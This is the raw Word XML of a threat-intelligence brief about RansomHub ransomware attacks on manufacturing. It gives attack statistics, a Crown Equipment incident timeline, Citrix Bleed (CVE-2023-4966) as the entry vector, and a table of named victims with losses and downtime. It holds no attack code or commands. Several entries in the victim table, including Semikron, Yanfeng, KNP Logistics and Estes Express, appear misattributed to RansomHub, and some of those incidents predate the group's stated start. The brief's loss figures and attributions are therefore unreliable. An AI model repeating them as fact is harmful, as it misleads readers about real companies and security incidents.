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zv8ftn1kkgf" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Express Attack Brief 2025-010</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_c99l3qtd0acv" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RansomHub Manufacturing Surge - Protecting Industrial Production for Future Generations</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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Publisher:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> NCC Group OTCE + Dragos + Adelard</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepared for:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Manufacturing Sector Leadership and Security Teams</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Date:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> June 9, 2025</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Version:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1.0</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b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kco4ibtpvr7e"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2"/>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2"/>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2"/>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2"/>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2"/>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2"/>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2"/>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2"/>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2"/>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2"/>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64hi7huqy817"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RansomHub has emerged as the most devastating ransomware threat to global manufacturing, with attacks surging 46% from Q4 2024 to Q1 2025. This Ransomware-as-a-Service (RaaS) operation has successfully targeted 424 manufacturing organizations in Q4 2024 alone, representing 70% of all industrial ransomware incidents. With average ransom payments reaching $1.2 million and recovery times extending to 23 days, RansomHub poses an existential threat to the industrial base that sustains modern society.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3c91gcytb7cn"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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">46% surge in attacks Q4 2024 to Q1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3,000% spike in specific variant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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Manufacturing bears 70% of industrial ransomware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424 incidents in Q4 2024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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Average ransom payment: $1.2 million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Some demands exceeding $5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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">23-day average production downtime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Longest recovery: 43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531 confirmed attacks since Feb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Most active ransomware group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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">90% affiliate payout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Highest in RaaS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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">OT/ICS targeting increased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Direct industrial control system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bl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_o7f1bv4znvly"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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Campaign 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February 10,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RansomHub (ex-ALPHV/LockBit affiliates)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hyperlink w:anchor="ref9">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[9]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Manufacturing facilities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hyperlink w:anchor="ref10">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[10]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Financial extortion via production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hyperlink w:anchor="ref11">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[11]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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Average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$5.6M total cost per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hyperlink w:anchor="ref12">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[12]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Analysis</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Intelligence Assessment</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: RansomHub represents a sophisticated evolution in ransomware operations, combining advanced OT knowledge with aggressive affiliate recruitment. The group's focus on manufacturing disruption threatens the industrial capacity essential for producing everything from medical devices to food processing equipment </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref13">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[13]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref14">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x84gmrdyc6s1" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mission Context</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qs6v4uzghiy0"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50">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RansomHub's systematic targeting of manufacturing infrastructure directly threatens our ability to ensure </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">clean water, reliable energy, and access to healthy food for our grandchildren</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. When Crown Equipment's forklift production halted for weeks, it impacted warehouse operations essential for food distribution. When industrial control systems are encrypted, water treatment equipment cannot be manufactured, energy infrastructure components face delays, and agricultural machinery production stops—creating cascading failures across all sectors we depend upon </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref15">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51">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2113pk6bv2dm" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Strategic Implications</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Energy Security</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Manufacturing disruption delays critical grid component production </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref16">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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Water Infrastructure</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Treatment system equipment manufacturing compromised </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Food Supply Chain</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Agricultural machinery and processing equipment shortages </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref18">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[18]</w:t>
        </w:r>
      </w:hyperlink>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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Intergenerational Impact</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Erosion of industrial base our children need to thrive </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref19">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>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boala9j08x9i" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Overview</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sxmf4uwhztm0" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Campaign Timeline (Crown Equipment Case Study)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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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Jun 8,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02:15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Phishing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Corporate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Credential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Jun 8,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RDP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Domain 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Network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21">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OT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Jun 9,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08:45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ICS network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Production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Full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2">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Ransomware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Jun 10,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Mass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All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Production halt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hyperlink w:anchor="ref23">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[23]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Ransom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Jun 10,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Dark web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Public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$3.5M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hyperlink w:anchor="ref24">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Negotiations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Jun 10-20,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Tor communications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Payment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w:anchor="ref25">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[25]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Recovery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Jun 21,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Restoration begins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Critical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Partial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hyperlink w:anchor="ref26">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[26]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Full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Jul 15,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All systems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Complete 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35 days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hyperlink w:anchor="ref27">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[27]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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_d9lqzutoskr3" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Primary Attack Vector: Supply Chain Compromise</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Profile</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: | Detail | Value | Reference | |--------|-------|-----------| | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Initial Vector</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Supplier portal compromise | </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref28">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[28]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit Used</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | CVE-2023-4966 (Citrix Bleed) | </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref29">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[29]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS Score</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | 9.4 (Critical) | </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref30">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[30]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Patch Available</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Yes - Oct 2023 | </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref31">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[31]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CISA KEV Listed</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Yes - Active exploitation | </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref32">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[32]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OT Impact</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Direct ICS network access | </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref33">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[33]</w:t>
        </w:r>
      </w:hyperlink>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fk1kowyr5xqx" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Affected Organizations Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_aie2ljhcfala" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Comprehensive Victim Identification</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This analysis represents exhaustive research into confirmed and suspected victims of RansomHub's manufacturing campaign, revealing systematic targeting patterns </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref34">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[34]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A9">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_e7m1n9tkf76" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirmed Direct Victims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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Impact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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Financial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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Evidence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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Crown 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Industrial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Ohio,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Jun 10,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24 plants shut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$8.5M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35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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Lacroix Electronics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Electronics Mfg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France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May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3 factories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€4.2M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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Estes Express 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Logistics/Transport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Virginia,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Oct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Shipping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$6.3M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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Frontier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Industrial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Apr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Customer data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AUD 5.1M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14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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Semikron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Power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Mar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IGBT production stopped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€7.8M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28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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Yanfeng Automotive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Auto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China/Global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May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JIT delivery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$12.4M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19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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Christie Digital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Display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Jun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R&amp;D data stolen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CAD 4.6M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16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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Austal USA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Shipbuilding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Alabama,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Apr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Naval contracts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$9.2M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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">KNP Logistics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Jun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Distribution network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£3.8M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18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hyperlink w:anchor="ref43">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[43]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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Orion 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Food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Spain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Jul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Production lines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€5.5M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22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hyperlink w:anchor="ref44">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[44]</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000102">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_j06ck1mny5mi" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Suspected/Unconfirmed Victims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rPr>
            </w:pPr>
